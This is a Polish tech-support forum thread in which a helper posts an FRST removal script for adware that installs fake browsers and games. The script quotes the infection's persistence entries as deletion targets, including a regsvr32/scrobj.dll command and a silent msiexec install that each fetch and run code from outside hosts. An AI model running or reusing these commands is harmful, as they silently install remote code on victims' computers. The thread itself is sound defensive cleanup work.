Wirus podmieniający przeglądarki, instalujący BigFarm, BigBang

potlowski · 29 Maja 2017

Dzień dobry,

nie mogę poradzić sobie ze zlokalizowaniem i usunięciem wirusa, który instaluje na moim komputerze pliki Big Farm i Big Bang Empire, przeglądarkę Chrome (nie korzystam z niej na co dzień) oraz powoduje, że w Firefox pojawia się mnóstwo reklam/okienek. W momencie, w którym wirus instaluje pliki, system Windows bardzo zwalnia, wiesza się, wyłącza się przeglądarka i antywirus AVG (nie można go w tym czasie ponownie uruchomić). Dodam, że żaden z tych plików oczywiście nie pokazuje się w "programy" Windows, można usunąć jedynie ikonę, a ręczna próba usunięcia Firefox/Chrome skończyła się fiaskiem, ponieważ system odmawia dostępu...

Próbowałem przez ostatnie 3 tygodnie codziennie czyścić komputer antywirusem i AdwCleanerem, odinstalować Firefox, ale bezskutecznie.

Wymagane logi wrzucam w załącznikach.

Proszę o pomoc.

Miszel03 · 29 Maja 2017

System jest zainfekowany przez adware. Widoczne są dwie fałszywki Mozilli FireFox oraz Google Chrome (= choć nie ma oryginalnej wersji). Nie będę się rozpisywać, bo codziennie widzę tu to samo.

Portale z oprogramowaniem / Instalatory - na co uważać

1. Otwórz Notatnik w nim wklej:

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\ChromeHTML: -> 
Task: {0C1573E6-EB72-4A0D-B905-E6C7F9C00BF2} - System32\Tasks\{D3350727-1A18-45FF-9650-FE53F21D8DB2} => pcalua.exe -a C:\Users\MAGDA\AppData\Local\Temp\{18E20274-F8B2-4061-934E-E94E4F113858}\InstallFlashPlayer.exe -d C:\Users\MAGDA\AppData\Local\Temp\ICD1.tmp -c -iv 6 
Task: {E1EE3ED7-C883-4490-878D-07DB4A475E93} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1YFjk8RkIcFjE8MdF4RUNSRjI1FUNLFdE3MUFcFdYdRF== scrobj.dll
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
RemoveDirectory: C:\Program Files (x86)\Bangtony
RemoveDirectory: C:\Users\MAGDA\AppData\Local\Bangtony
RemoveDirectory: C:\Users\MAGDA\AppData\Roaming\Bangtony
FirewallRules: [{E980C772-4A40-40FF-8818-542C65790C55}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikHelper.exe
FirewallRules: [{27FC16EC-FFB1-4520-9657-903708EE55B9}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikHelper.exe
FirewallRules: [{F76C0C47-6098-4C47-BFF2-D79F08D068BE}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikFlashPlayer.exe
FirewallRules: [{F5CB7DEC-6781-44FD-867F-C35B93477FAC}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikFlashPlayer.exe
FirewallRules: [{D5CF5E93-C38C-43BA-AAED-B6B1F3D663F0}] => (Allow) C:\Program Files (x86)\Bangtony\Application\chrome.exe
FirewallRules: [{17AA0B84-A7C8-4140-B2BF-336ADA96EDEB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{77E9E3FC-75B2-4FF6-A776-0532C8B8AC4F}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\MAGDA\AppData\Local\Firefox
RemoveDirectory: C:\Users\MAGDA\AppData\Roaming\Firefox
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjk8RkIcFjE8MdF4RUNSRjI1FUNLFdE3MUFcFdYdRF== /q
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
GroupPolicy\User: Ograniczenia 
GroupPolicyUsers\S-1-5-21-266744301-1538140241-1666147108-1003\User: Ograniczenia 
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-266744301-1538140241-1666147108-1000 -> {E88E0043-C9D4-4e33-8555-FEE4F5B63060} URL = hxxp://go.mail.ru/search?q={searchTerms}&utf8in=1&fr=ietb
BHO-x32: Brak nazwy -> {8984B388-A5BB-4DF7-B274-77B879E179DB} -> Brak pliku
BHO-x32: Brak nazwy -> {b18906df-1dfa-4d50-8a1f-7d076a8c87b7} -> Brak pliku
Toolbar: HKU\S-1-5-21-266744301-1538140241-1666147108-1000 -> Brak nazwy - {09900DE8-1DCA-443F-9243-26FF581438AF} - Brak pliku
R2 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp [210946 ] () [brak podpisu cyfrowego] 
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [93696 2017-05-26] () [brak podpisu cyfrowego] 
S1 MpKsl609328ae; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{15547DD3-66D3-4FC6-A0C8-D0267EAC43CD}\MpKsl609328ae.sys [X]
R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [brak podpisu cyfrowego] 
C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp
C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp
2017-05-29 07:14 - 2017-05-29 07:19 - 00000000 ____D C:\Program Files (x86)\BiaoJi
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Witryna Sage.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia Handel - Stacja robocza.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Aktywacja.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Elektroniczne zgłoszenie problemu.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Symfonia Handel - Stacja robocza.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Umowa licencyjna.lnk
C:\Users\Gość\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk
C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\MAGDA\AppData\Roaming\Microsoft\Word\aneks_pol%20levant305943631758176149\aneks_pol%20levant.doc.lnk
C:\Users\MAGDA\AppData\Roaming\Microsoft\Excel\03%20kwiecień%202017305869361454104687\03%20kwiecień%202017.xls.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\MAGDA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\MAGDA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Program Files (x86)\Google
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
C:\Users\MAGDA\AppData\Local\Google
DeleteKey: HKCU\Software\Google
DeleteKey: HKLM\SOFTWARE\Google
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google
EmptyTemp:

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

2. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox.

Odłącz synchronizację (o ile włączona): KLIK.
Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone.
Menu Historia > Wyczyść historię przeglądania.
Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Mozilla FireFox. To wymagany krok to kasacji modyfikacji infekcji.